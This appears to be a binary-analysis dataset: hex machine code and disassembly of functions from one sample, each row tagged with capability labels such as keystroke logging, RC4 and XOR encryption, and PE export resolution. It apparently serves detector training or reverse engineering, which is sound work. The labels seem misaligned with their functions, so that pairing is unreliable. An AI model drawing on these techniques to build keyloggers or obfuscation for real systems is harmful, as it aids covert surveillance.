175548b461c8d54241c5250ff1524f64b008b4e1c51ff1540f64b0050e84e1408008bf885ff741a8bcee8ad3c0800a900000080750c8d54241c8bcf52e8686208008b44241c85db74048b44242089442414e94202000057e8466cfeff03f857e83e6cfeff83c40883fb018d440704750383c0048b0089442414e91a02000083f801753a8b4e1c8d44241c5051ff1524f64b0083fb0275138b4424248b4c241c2bc189442414e9ee0100008b4424288b4c24202bc189442414e9db01000057e8df6bfeff03f857e8d76bfeff83c40883fb038d44070c759c83c0048b0089442414e9b301000057e8b76bfeff03f857e8af6bfeff8b54071c8d44071c8b4c90048d4490048d44010450e865b9ffff83c40c89442414e97f01000083f801751c8b561c52ff15dcf54b0033c985c00f95c18bc189442414e95e01000057e8626bfeff03f857e85a6bfeff8b54071c8d44071c8b4c90048d4490048d74010456e8406bfeff8b44300483c40c83e00189442414e92301000083f80175158bcee8e93c0800f7d81bc04089442414e90901000057e80d6bfeff03f857e8056bfeff8b54071c8d44071c8b4c90048d4490048d74080456e8eb6afeff8b44300483c40cd1e883e00189442414e9cc00000057e8d06afeff03f857e8c86afeff8b54071c8d44071c83c4088b4c90048d44900483f9047244c744243c000000008b0883c00451508d4c2434e82868feff8b74243c8b442434f7de1bf623f08b1652e8d28e000089068b4424405056e8d5b8ffff83c40c89442414eb6283c0045150e8c2b8ffff83c40889442414eb4f85c0750f8b4c2410506870904f00e8a6eeffff6a06ff552c8d54241c33c983c3f852894c24205356894c242cffd08b54245c8d4424148d4c241c508b44245c518b4c24185250e80e0500008b4424148b7c24188d4c242c8bf0c7442448ffffffffc744242ca8cf4d00e80b62feff8b4c24408bc65e8bd75b5f5d64890d0000000083c43cc21000
|
[
"push 0xffffffffffffffff",
"push 0x4b9b38",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x30",
"push ebp",
"push edi",
"mov edi, ecx",
"xor ebp, ebp",
"mov ecx, dword [esp + 0x48]",
"lea eax, [esp + 0x48]",
"push ebp",
"push eax",
"push ecx",
"lea ecx, [edi + 0x104]",
"mov dword [esp + 0x14], edi",
"mov dword [esp + 0x18], ebp",
"mov dword [esp + 0x1c], ebp",
"call fcn.00427de0",
"test eax, eax",
"jne 0x42cf4c",
"push ebp",
"push 0x4f9084",
"mov ecx, edi",
"call fcn.0042c160",
"mov eax, dword [esp + 0xc]",
"mov edx, dword [esp + 0x10]",
"pop edi",
"pop ebp",
"mov ecx, dword [esp + 0x30]",
"mov dword fs:[0], ecx",
"add esp, 0x3c",
"ret 0x10",
"mov edx, dword [esp + 0x48]",
"push ebx",
"mov ebx, dword [esp + 0x50]",
"push esi",
"push ebp",
"push ebp",
"push ebx",
"lea ecx, [edx + 0x14]",
"call fcn.00427810",
"lea ecx, [esp + 0x2c]",
"mov esi, eax",
"call fcn.00413320",
"push ebx",
"mov dword [esp + 0x4c], ebp",
"call fcn.00427f90",
"add esp, 4",
"test eax, eax",
"je 0x42cfef",
"add esi, 0x18",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov ecx, dword [esp + 0x60]",
"add esp, 8",
"cmp ecx, 3",
"lea eax, [esi + eax + 8]",
"ja case.default.0x42d054",
"jmp dword [ecx*4 + 0x42d330]",
"add eax, 4",
"push eax",
"call fcn.00428ad0",
"add esp, 4",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"mov eax, dword [eax]",
"shr eax, 2",
"and eax, 1",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"mov eax, dword [eax]",
"shr eax, 1",
"and eax, 1",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"mov eax, dword [eax]",
"not eax",
"and eax, 1",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"mov eax, dword [esi]",
"push ebp",
"push eax",
"mov ecx, edi",
"call fcn.0042c2a0",
"mov ebx, dword [esp + 0x58]",
"mov ebp, eax",
"lea edi, [esi + 0x18]",
"mov edx, dword [ebp + 0x28]",
"lea ecx, [ebx + ebx*4]",
"mov esi, edi",
"lea eax, [edx + ecx*4]",
"push esi",
"mov dword [esp + 0x5c], eax",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"add esp, 8",
"mov esi, dword [esi]",
"test esi, esi",
"je 0x42d040",
"mov ecx, dword [esi + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42d040",
"mov eax, 1",
"jmp 0x42d042",
"xor eax, eax",
"cmp ebx, 8",
"jge 0x42d2a7",
"cmp ebx, 7",
"ja case.default.0x42d054",
"jmp dword [ebx*4 + 0x42d340]",
"cmp eax, 1",
"jne 0x42d0b4",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x1c]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetWindowRect]",
"mov ecx, dword [esi + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_GetParent]",
"push eax",
"call fcn.004ae4cd",
"mov edi, eax",
"test edi, edi",
"je 0x42d09f",
"mov ecx, esi",
"call fcn.004b0d39",
"test eax, 0x80000000",
"jne 0x42d09f",
"lea edx, [esp + 0x1c]",
"mov ecx, edi",
"push edx",
"call fcn.004b3307",
"mov eax, dword [esp + 0x1c]",
"test ebx, ebx",
"je 0x42d0ab",
"mov eax, dword [esp + 0x20]",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add esp, 8",
"cmp ebx, 1",
"lea eax, [edi + eax + 4]",
"jne 0x42d0d1",
"add eax, 4",
"mov eax, dword [eax]",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"cmp eax, 1",
"jne 0x42d11b",
"mov ecx, dword [esi + 0x1c]",
"lea eax, [esp + 0x1c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_GetWindowRect]",
"cmp ebx, 2",
"jne 0x42d108",
"mov eax, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x1c]",
"sub eax, ecx",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"mov eax, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x20]",
"sub eax, ecx",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add esp, 8",
"cmp ebx, 3",
"lea eax, [edi + eax + 0xc]",
"jne 0x42d0d1",
"add eax, 4",
"mov eax, dword [eax]",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov edx, dword [edi + eax + 0x1c]",
"lea eax, [edi + eax + 0x1c]",
"mov ecx, dword [eax + edx*4 + 4]",
"lea eax, [eax + edx*4 + 4]",
"lea eax, [ecx + eax + 4]",
"push eax",
"call fcn.00428ad0",
"add esp, 0xc",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"cmp eax, 1",
"jne 0x42d198",
"mov edx, dword [esi + 0x1c]",
"push edx",
"call dword [sym.imp.USER32.dll_IsWindowVisible]",
"xor ecx, ecx",
"test eax, eax",
"setne cl",
"mov eax, ecx",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov edx, dword [edi + eax + 0x1c]",
"lea eax, [edi + eax + 0x1c]",
"mov ecx, dword [eax + edx*4 + 4]",
"lea eax, [eax + edx*4 + 4]",
"lea esi, [ecx + eax + 4]",
"push esi",
"call fcn.00413d00",
"mov eax, dword [eax + esi + 4]",
"add esp, 0xc",
"and eax, 1",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"cmp eax, 1",
"jne 0x42d1ed",
"mov ecx, esi",
"call fcn.004b0ec8",
"neg eax",
"sbb eax, eax",
"inc eax",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov edx, dword [edi + eax + 0x1c]",
"lea eax, [edi + eax + 0x1c]",
"mov ecx, dword [eax + edx*4 + 4]",
"lea eax, [eax + edx*4 + 4]",
"lea esi, [eax + ecx + 4]",
"push esi",
"call fcn.00413d00",
"mov eax, dword [eax + esi + 4]",
"add esp, 0xc",
"shr eax, 1",
"and eax, 1",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov edx, dword [edi + eax + 0x1c]",
"lea eax, [edi + eax + 0x1c]",
"add esp, 8",
"mov ecx, dword [eax + edx*4 + 4]",
"lea eax, [eax + edx*4 + 4]",
"cmp ecx, 4",
"jb 0x42d294",
"mov dword [esp + 0x3c], 0",
"mov ecx, dword [eax]",
"add eax, 4",
"push ecx",
"push eax",
"lea ecx, [esp + 0x34]",
"call fcn.00413a90",
"mov esi, dword [esp + 0x3c]",
"mov eax, dword [esp + 0x34]",
"neg esi",
"sbb esi, esi",
"and esi, eax",
"mov edx, dword [esi]",
"push edx",
"call fcn.00436150",
"mov dword [esi], eax",
"mov eax, dword [esp + 0x40]",
"push eax",
"push esi",
"call fcn.00428b60",
"add esp, 0xc",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"add eax, 4",
"push ecx",
"push eax",
"call fcn.00428b60",
"add esp, 8",
"mov dword [esp + 0x14], eax",
"jmp 0x42d2f6",
"test eax, eax",
"jne 0x42d2ba",
"mov ecx, dword [esp + 0x10]",
"push eax",
"push 0x4f9070",
"call fcn.0042c160",
"push 6",
"call dword [ebp + 0x2c]",
"lea edx, [esp + 0x1c]",
"xor ecx, ecx",
"add ebx, 0xfffffff8",
"push edx",
"mov dword [esp + 0x20], ecx",
"push ebx",
"push esi",
"mov dword [esp + 0x2c], ecx",
"call eax",
"mov edx, dword [esp + 0x5c]",
"lea eax, [esp + 0x14]",
"lea ecx, [esp + 0x1c]",
"push eax",
"mov eax, dword [esp + 0x5c]",
"push ecx",
"mov ecx, dword [esp + 0x18]",
"push edx",
"push eax",
"call fcn.0042d800",
"mov eax, dword [esp + 0x14]",
"mov edi, dword [esp + 0x18]",
"lea ecx, [esp + 0x2c]",
"mov esi, eax",
"mov dword [esp + 0x48], 0xffffffff",
"mov dword [esp + 0x2c], 0x4dcfa8",
"call fcn.00413520",
"mov ecx, dword [esp + 0x40]",
"mov eax, esi",
"pop esi",
"mov edx, edi",
"pop ebx",
"pop edi",
"pop ebp",
"mov dword fs:[0], ecx",
"add esp, 0x3c",
"ret 0x10"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x431f60
|
[
"Resolve function by parsing pe exports"
] |
6aff68489f4b0064a100000000506489250000000081ec880000005556578bbc24a40000008bf185ff897424280f84c50400008b461c5750ff1514f64b0085c00f84b20400006a006a0068e9030000e8ccadffff8b96dc0000008d4c240c6a0051528bc8e8175effff85c00f84870400008b4c240c6a0157e89366ffff8be883fdff896c24200f846c0400008b44240c6a006a00558d4814e89357ffff8b085168ea030000e876adffff8bf085f60f8444040000538b5e1481e30060000057f7db1bdbf7db895c2424ff1540f64b008b54241033ff57558d4a1489442430e84d57ffff8b4e14f6c5407406897c241ceb248b4c24105083c114e862e3fdff8b108d74100456e8961cfeff8b44300883c4048944241c8d4c2430e8a212feffbeaccf4d00897424308d4c245889bc24a0000000e88912feff897424588d4c2444c68424a000000001e87412feff897424448b4c2410c68424a0000000028b71184e3bf7897424180f8ec30100008b5424106a00568d4a14e8b556ffff8be88b442410568d4814e8d65effff83f801750a4e89742418e98a0100008b4d006a005168ea030000e877acffff8d75188bd856e8ec1bfeff03f056e8e41bfeff8b54241883c40803f08d4a14558b36e890e2fdff8b088d7c080457e8c41bfeff8b54380483c40485db895424140f842501000085f60f841d0100008b461c50ff154cf64b0085c00f840b0100008b4e1c51ff15dcf54b0083f8010f85f80000008bcee845ed070083f8010f85e80000008b5b14f7c3008001000f85d9000000f6442414040f84ce0000008b8424b000000085c0741df6c7040f84ba0000008b561c52ff1540f64b003b4424280f85a60000008b8424b400000085c074138b4e1c5150ff1514f64b0085c00f84880000008b542410558d4a14e8c7e1fdff8b088d7c080457e8fb1afeff8b5c38088b442444c1e80283c4044878138b5424388d0c8239197e084883e90485c07df48b4c2418408d5424146a048d3c8500000000894c241852578d4c2450e8a617feff8d4424146a0450578d4c246489742420e89117feff8d4c24146a0451578d4c243c895c2420e87c17feff8b4424188b5c242048894424188bf085f60f8f41feffff8b6c24248b4424548bf8c1ef0285ff0f8e7001000083fb0175638b4424408b5424388b8c24ac000000f7d81bc023c23bcb752533f685ff0f8e480100008b54241c8b083bca0f8d840000004683c0043bf77ceae92d0100008d77ff85f60f8c220100008d04b08b4c241c8b103bd17c5f4e83e80485f67deee9080100008b4c244c55f7d81bc05723c18bd853e8a419feff8bf083c40c83feff7516555753e8723400008bf083c40c83feff0f843601000083bc24ac00000001750e392cb3750f463bf7750a33f6eb0f4e79038d77ff83feff0f84ad0000008b5424608b8424a80000008b2cb28b5d1c3bd80f849400000083bc24b000000001757853ff1540f64b008b4c241050e89964ffff8b451c6a006a0168f100000050ff1558f64b008b4c242c8b54244c8bb9dc0000008b04b28b4c24105083c114e81854ffff8944247033c08d54246c505268d8070000897c247889842480000000898424840000008984249c000000898424a0000000e882a9ffff53ff154cf64b0085c074078bcde8faea0700bea8cf4d008d4c2444c68424a00000000189742444e8f610feff8d4c2458c68424a00000000089742458e8e110feff8d4c2430c78424a0000000ffffffff89742430e8c910feff5b8b8c24940000005f5e5d64890d0000000081c494000000c2100083bc24ac000000010f85d7feffff33f6e9dcfeffff
|
[
"push 0xffffffffffffffff",
"push 0x4b9f48",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x88",
"push ebp",
"push esi",
"push edi",
"mov edi, dword [esp + 0xa4]",
"mov esi, ecx",
"test edi, edi",
"mov dword [esp + 0x28], esi",
"je 0x432458",
"mov eax, dword [esi + 0x1c]",
"push edi",
"push eax",
"call dword [sym.imp.USER32.dll_IsChild]",
"test eax, eax",
"je 0x432458",
"push 0",
"push 0",
"push 0x3e9",
"call fcn.0042cd80",
"mov edx, dword [esi + 0xdc]",
"lea ecx, [esp + 0xc]",
"push 0",
"push ecx",
"push edx",
"mov ecx, eax",
"call fcn.00427de0",
"test eax, eax",
"je 0x432458",
"mov ecx, dword [esp + 0xc]",
"push 1",
"push edi",
"call fcn.00428670",
"mov ebp, eax",
"cmp ebp, 0xffffffff",
"mov dword [esp + 0x20], ebp",
"je 0x432458",
"mov eax, dword [esp + 0xc]",
"push 0",
"push 0",
"push ebp",
"lea ecx, [eax + 0x14]",
"call fcn.00427790",
"mov ecx, dword [eax]",
"push ecx",
"push 0x3ea",
"call fcn.0042cd80",
"mov esi, eax",
"test esi, esi",
"je 0x432458",
"push ebx",
"mov ebx, dword [esi + 0x14]",
"and ebx, 0x6000",
"push edi",
"neg ebx",
"sbb ebx, ebx",
"neg ebx",
"mov dword [esp + 0x24], ebx",
"call dword [sym.imp.USER32.dll_GetParent]",
"mov edx, dword [esp + 0x10]",
"xor edi, edi",
"push edi",
"push ebp",
"lea ecx, [edx + 0x14]",
"mov dword [esp + 0x30], eax",
"call fcn.00427790",
"mov ecx, dword [esi + 0x14]",
"test ch, 0x40",
"je 0x432051",
"mov dword [esp + 0x1c], edi",
"jmp 0x432075",
"mov ecx, dword [esp + 0x10]",
"push eax",
"add ecx, 0x14",
"call fcn.004103c0",
"mov edx, dword [eax]",
"lea esi, [eax + edx + 4]",
"push esi",
"call fcn.00413d00",
"mov eax, dword [eax + esi + 8]",
"add esp, 4",
"mov dword [esp + 0x1c], eax",
"lea ecx, [esp + 0x30]",
"call fcn.00413320",
"mov esi, 0x4dcfac",
"mov dword [esp + 0x30], esi",
"lea ecx, [esp + 0x58]",
"mov dword [esp + 0xa0], edi",
"call fcn.00413320",
"mov dword [esp + 0x58], esi",
"lea ecx, [esp + 0x44]",
"mov byte [esp + 0xa0], 1",
"call fcn.00413320",
"mov dword [esp + 0x44], esi",
"mov ecx, dword [esp + 0x10]",
"mov byte [esp + 0xa0], 2",
"mov esi, dword [ecx + 0x18]",
"dec esi",
"cmp esi, edi",
"mov dword [esp + 0x18], esi",
"jle 0x43228f",
"mov edx, dword [esp + 0x10]",
"push 0",
"push esi",
"lea ecx, [edx + 0x14]",
"call fcn.00427790",
"mov ebp, eax",
"mov eax, dword [esp + 0x10]",
"push esi",
"lea ecx, [eax + 0x14]",
"call fcn.00427fc0",
"cmp eax, 1",
"jne 0x4320f9",
"dec esi",
"mov dword [esp + 0x18], esi",
"jmp 0x432283",
"mov ecx, dword [ebp]",
"push 0",
"push ecx",
"push 0x3ea",
"call fcn.0042cd80",
"lea esi, [ebp + 0x18]",
"mov ebx, eax",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov edx, dword [esp + 0x18]",
"add esp, 8",
"add esi, eax",
"lea ecx, [edx + 0x14]",
"push ebp",
"mov esi, dword [esi]",
"call fcn.004103c0",
"mov ecx, dword [eax]",
"lea edi, [eax + ecx + 4]",
"push edi",
"call fcn.00413d00",
"mov edx, dword [eax + edi + 4]",
"add esp, 4",
"test ebx, ebx",
"mov dword [esp + 0x14], edx",
"je 0x432274",
"test esi, esi",
"je 0x432274",
"mov eax, dword [esi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x432274",
"mov ecx, dword [esi + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsWindowVisible]",
"cmp eax, 1",
"jne 0x432274",
"mov ecx, esi",
"call fcn.004b0ec8",
"cmp eax, 1",
"jne 0x432274",
"mov ebx, dword [ebx + 0x14]",
"test ebx, 0x18000",
"jne 0x432274",
"test byte [esp + 0x14], 4",
"je 0x432274",
"mov eax, dword [esp + 0xb0]",
"test eax, eax",
"je 0x4321ce",
"test bh, 4",
"je 0x432274",
"mov edx, dword [esi + 0x1c]",
"push edx",
"call dword [sym.imp.USER32.dll_GetParent]",
"cmp eax, dword [esp + 0x28]",
"jne 0x432274",
"mov eax, dword [esp + 0xb4]",
"test eax, eax",
"je 0x4321ec",
"mov ecx, dword [esi + 0x1c]",
"push ecx",
"push eax",
"call dword [sym.imp.USER32.dll_IsChild]",
"test eax, eax",
"je 0x432274",
"mov edx, dword [esp + 0x10]",
"push ebp",
"lea ecx, [edx + 0x14]",
"call fcn.004103c0",
"mov ecx, dword [eax]",
"lea edi, [eax + ecx + 4]",
"push edi",
"call fcn.00413d00",
"mov ebx, dword [eax + edi + 8]",
"mov eax, dword [esp + 0x44]",
"shr eax, 2",
"add esp, 4",
"dec eax",
"js 0x432229",
"mov edx, dword [esp + 0x38]",
"lea ecx, [edx + eax*4]",
"cmp dword [ecx], ebx",
"jle 0x432229",
"dec eax",
"sub ecx, 4",
"test eax, eax",
"jge 0x43221d",
"mov ecx, dword [esp + 0x18]",
"inc eax",
"lea edx, [esp + 0x14]",
"push 4",
"lea edi, [eax*4]",
"mov dword [esp + 0x18], ecx",
"push edx",
"push edi",
"lea ecx, [esp + 0x50]",
"call fcn.004139f0",
"lea eax, [esp + 0x14]",
"push 4",
"push eax",
"push edi",
"lea ecx, [esp + 0x64]",
"mov dword [esp + 0x20], esi",
"call fcn.004139f0",
"lea ecx, [esp + 0x14]",
"push 4",
"push ecx",
"push edi",
"lea ecx, [esp + 0x3c]",
"mov dword [esp + 0x20], ebx",
"call fcn.004139f0",
"mov eax, dword [esp + 0x18]",
"mov ebx, dword [esp + 0x20]",
"dec eax",
"mov dword [esp + 0x18], eax",
"mov esi, eax",
"test esi, esi",
"jg 0x4320cc",
"mov ebp, dword [esp + 0x24]",
"mov eax, dword [esp + 0x54]",
"mov edi, eax",
"shr edi, 2",
"test edi, edi",
"jle 0x432410",
"cmp ebx, 1",
"jne 0x432308",
"mov eax, dword [esp + 0x40]",
"mov edx, dword [esp + 0x38]",
"mov ecx, dword [esp + 0xac]",
"neg eax",
"sbb eax, eax",
"and eax, edx",
"cmp ecx, ebx",
"jne 0x4322e3",
"xor esi, esi",
"test edi, edi",
"jle 0x432410",
"mov edx, dword [esp + 0x1c]",
"mov ecx, dword [eax]",
"cmp ecx, edx",
"jge 0x43235a",
"inc esi",
"add eax, 4",
"cmp esi, edi",
"jl 0x4322c8",
"jmp 0x432410",
"lea esi, [edi - 1]",
"test esi, esi",
"jl 0x432410",
"lea eax, [eax + esi*4]",
"mov ecx, dword [esp + 0x1c]",
"mov edx, dword [eax]",
"cmp edx, ecx",
"jl 0x43235a",
"dec esi",
"sub eax, 4",
"test esi, esi",
"jge 0x4322f1",
"jmp 0x432410",
"mov ecx, dword [esp + 0x4c]",
"push ebp",
"neg eax",
"sbb eax, eax",
"push edi",
"and eax, ecx",
"mov ebx, eax",
"push ebx",
"call fcn.00413cc0",
"mov esi, eax",
"add esp, 0xc",
"cmp esi, 0xffffffff",
"jne 0x43233c",
"push ebp",
"push edi",
"push ebx",
"call fcn.004357a0",
"mov esi, eax",
"add esp, 0xc",
"cmp esi, 0xffffffff",
"je 0x432472",
"cmp dword [esp + 0xac], 1",
"jne 0x432354",
"cmp dword [ebx + esi*4], ebp",
"jne 0x43235a",
"inc esi",
"cmp esi, edi",
"jne 0x43235a",
"xor esi, esi",
"jmp 0x432363",
"dec esi",
"jns 0x43235a",
"lea esi, [edi - 1]",
"cmp esi, 0xffffffff",
"je 0x432410",
"mov edx, dword [esp + 0x60]",
"mov eax, dword [esp + 0xa8]",
"mov ebp, dword [edx + esi*4]",
"mov ebx, dword [ebp + 0x1c]",
"cmp ebx, eax",
"je 0x432410",
"cmp dword [esp + 0xb0], 1",
"jne 0x4323fe",
"push ebx",
"call dword [sym.imp.USER32.dll_GetParent]",
"mov ecx, dword [esp + 0x10]",
"push eax",
"call fcn.00428830",
"mov eax, dword [ebp + 0x1c]",
"push 0",
"push 1",
"push 0xf1",
"push eax",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"mov ecx, dword [esp + 0x2c]",
"mov edx, dword [esp + 0x4c]",
"mov edi, dword [ecx + 0xdc]",
"mov eax, dword [edx + esi*4]",
"mov ecx, dword [esp + 0x10]",
"push eax",
"add ecx, 0x14",
"call fcn.004277e0",
"mov dword [esp + 0x70], eax",
"xor eax, eax",
"lea edx, [esp + 0x6c]",
"push eax",
"push edx",
"push 0x7d8",
"mov dword [esp + 0x78], edi",
"mov dword [esp + 0x80], eax",
"mov dword [esp + 0x84], eax",
"mov dword [esp + 0x9c], eax",
"mov dword [esp + 0xa0], eax",
"call fcn.0042cd80",
"push ebx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x432410",
"mov ecx, ebp",
"call fcn.004b0f0a",
"mov esi, 0x4dcfa8",
"lea ecx, [esp + 0x44]",
"mov byte [esp + 0xa0], 1",
"mov dword [esp + 0x44], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x58]",
"mov byte [esp + 0xa0], 0",
"mov dword [esp + 0x58], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x30]",
"mov dword [esp + 0xa0], 0xffffffff",
"mov dword [esp + 0x30], esi",
"call fcn.00413520",
"pop ebx",
"mov ecx, dword [esp + 0x94]",
"pop edi",
"pop esi",
"pop ebp",
"mov dword fs:[0], ecx",
"add esp, 0x94",
"ret 0x10",
"cmp dword [esp + 0xac], 1",
"jne 0x432357",
"xor esi, esi",
"jmp 0x432363"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4348f0
|
[
"Log keystrokes via polling"
] |
8b44240456578b3d4cf54b008a480881e1ff0000008bf16683fe6072516683fe69774b81c6d0ff00006683fe11740f6a11ffd76685c07d0681ce002000006683fe10740f6a10ffd76685c07d0681ce004000006683fe12740f6a12ffd76685c07d0681ce00800000668bc65f5ec36683fe6d7507bebd000000ebb46683fe6e7507bebe000000eba76683fe6f759bbebf000000eb9a
|
[
"mov eax, dword [esp + 4]",
"push esi",
"push edi",
"mov edi, dword [sym.imp.USER32.dll_GetKeyState]",
"mov cl, byte [eax + 8]",
"and ecx, 0xff",
"mov esi, ecx",
"cmp si, 0x60",
"jb 0x43495e",
"cmp si, 0x69",
"ja 0x43495e",
"add esi, 0xffd0",
"cmp si, 0x11",
"je 0x43492e",
"push 0x11",
"call edi",
"test ax, ax",
"jge 0x43492e",
"or esi, 0x2000",
"cmp si, 0x10",
"je 0x434943",
"push 0x10",
"call edi",
"test ax, ax",
"jge 0x434943",
"or esi, 0x4000",
"cmp si, 0x12",
"je 0x434958",
"push 0x12",
"call edi",
"test ax, ax",
"jge 0x434958",
"or esi, 0x8000",
"mov ax, si",
"pop edi",
"pop esi",
"ret",
"cmp si, 0x6d",
"jne 0x43496b",
"mov esi, 0xbd",
"jmp 0x43491f",
"cmp si, 0x6e",
"jne 0x434978",
"mov esi, 0xbe",
"jmp 0x43491f",
"cmp si, 0x6f",
"jne 0x434919",
"mov esi, 0xbf",
"jmp 0x43491f"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x436ae0
|
[
"Encrypt data using rc4 ksa"
] |
51a1b878510033d23bc2751a33c08880b8775100403d000100007cf2c705b8785100010000008b44240c538b5c24145657b940000000beb87751008bfbf3a53bc28893000100008893010100007e6833f6558854242033c98b7c24208b6c24188a041e81e7ff00000033d28a142f8be881e5ff00000003ca03cd81e1ff00008079084981c900ffffff41884c24108b4c241081e1ff0000008a141988141e8804198d470199f77c241c4681fe00010000885424207ca25d5f5e5b59c3
|
[
"push ecx",
"mov eax, dword [0x5178b8]",
"xor edx, edx",
"cmp eax, edx",
"jne 0x436b06",
"xor eax, eax",
"mov byte [eax + 0x5177b8], al",
"inc eax",
"cmp eax, 0x100",
"jl 0x436aee",
"mov dword [0x5178b8], 1",
"mov eax, dword [esp + 0xc]",
"push ebx",
"mov ebx, dword [esp + 0x14]",
"push esi",
"push edi",
"mov ecx, 0x40",
"mov esi, 0x5177b8",
"mov edi, ebx",
"rep movsd dword es:[edi], dword [esi]",
"cmp eax, edx",
"mov byte [ebx + 0x100], dl",
"mov byte [ebx + 0x101], dl",
"jle 0x436b97",
"xor esi, esi",
"push ebp",
"mov byte [esp + 0x20], dl",
"xor ecx, ecx",
"mov edi, dword [esp + 0x20]",
"mov ebp, dword [esp + 0x18]",
"mov al, byte [esi + ebx]",
"and edi, 0xff",
"xor edx, edx",
"mov dl, byte [edi + ebp]",
"mov ebp, eax",
"and ebp, 0xff",
"add ecx, edx",
"add ecx, ebp",
"and ecx, 0x800000ff",
"jns 0x436b6a",
"dec ecx",
"or ecx, 0xffffff00",
"inc ecx",
"mov byte [esp + 0x10], cl",
"mov ecx, dword [esp + 0x10]",
"and ecx, 0xff",
"mov dl, byte [ecx + ebx]",
"mov byte [esi + ebx], dl",
"mov byte [ecx + ebx], al",
"lea eax, [edi + 1]",
"cdq",
"idiv dword [esp + 0x1c]",
"inc esi",
"cmp esi, 0x100",
"mov byte [esp + 0x20], dl",
"jl 0x436b38",
"pop ebp",
"pop edi",
"pop esi",
"pop ebx",
"pop ecx",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x436c10
|
[
"Encode data using xor"
] |
558bec83ec088b45105356578a88000100008a90010100008945f8884dff8855fe33db8a5dff33d28a55fe8b75f88b7d0833c08b4d0c85c97e19fec38a041e02d086041688041e0204168a04063007474975e7885dff8855fe8b45108a4dff8a55fe5f5e8888000100008890010100005b8be55dc3
|
[
"push ebp",
"mov ebp, esp",
"sub esp, 8",
"mov eax, dword [ebp + 0x10]",
"push ebx",
"push esi",
"push edi",
"mov cl, byte [eax + 0x100]",
"mov dl, byte [eax + 0x101]",
"mov dword [ebp - 8], eax",
"mov byte [ebp - 1], cl",
"mov byte [ebp - 2], dl",
"xor ebx, ebx",
"mov bl, byte [ebp - 1]",
"xor edx, edx",
"mov dl, byte [ebp - 2]",
"mov esi, dword [ebp - 8]",
"mov edi, dword [ebp + 8]",
"xor eax, eax",
"mov ecx, dword [ebp + 0xc]",
"test ecx, ecx",
"jle 0x436c63",
"inc bl",
"mov al, byte [esi + ebx]",
"add dl, al",
"xchg byte [esi + edx], al",
"mov byte [esi + ebx], al",
"add al, byte [esi + edx]",
"mov al, byte [esi + eax]",
"xor byte [edi], al",
"inc edi",
"dec ecx",
"jne 0x436c4a",
"mov byte [ebp - 1], bl",
"mov byte [ebp - 2], dl",
"mov eax, dword [ebp + 0x10]",
"mov cl, byte [ebp - 1]",
"mov dl, byte [ebp - 2]",
"pop edi",
"pop esi",
"mov byte [eax + 0x100], cl",
"mov byte [eax + 0x101], dl",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4393b0
|
[
"Access peb ldr_data",
"Get process heap flags"
] |
